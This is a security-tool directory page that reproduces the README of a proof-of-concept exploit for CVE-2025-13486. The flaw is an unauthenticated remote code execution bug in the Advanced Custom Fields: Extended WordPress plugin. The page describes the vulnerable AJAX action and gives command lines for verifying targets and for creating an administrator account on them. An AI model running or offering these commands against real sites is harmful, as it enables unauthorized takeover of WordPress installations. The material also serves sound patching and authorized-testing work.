Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/0xanis/cve-2025-13486-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xanis/cve-2025-13486-poc

CVE-2025-13486-POC

POC for CVE-2025-13486

View Repository
529 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-13486 Proof of Concept

A Proof of Concept (PoC) exploit for CVE-2025-13486, a Remote Code Execution vulnerability in the Advanced Custom Fields: Extended (ACFE) WordPress plugin.

Vulnerability Overview

This vulnerability exists in ACFE versions 0.9.0.5 through 0.9.1.1, allowing unauthenticated attackers to execute arbitrary PHP functions via the acfe/form/render_form_ajax AJAX action. The plugin uses call_user_func_array() with user-supplied input without proper validation.

Features

  • Verification Mode: Safely verify if a target is vulnerable using print_r (non-destructive)
  • Exploitation Mode: Create an administrator account on vulnerable WordPress installations
  • Automatic Nonce Extraction: Automatically extracts required nonce from target WordPress site

Requirements

root@kitploit:~
pip install requests

Usage

Verify Vulnerability (Recommended First Step)

Download Tool
root@kitploit:~
python poc.py -u http://target-site.com --verify

Exploit (Create Admin User)

root@kitploit:~
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com

# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]

Options

root@kitploit:~
-u, --url       Target WordPress URL (required)
--verify        Only verify vulnerability (safer, uses print_r)
--user          Username to create (default: random)
--password      Password to set (default: random)
--email         Email address to set (default: random)

Disclaimer

This PoC is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.

References

  • CVE-2025-13486
  • Advanced Custom Fields: Extended WordPress Plugin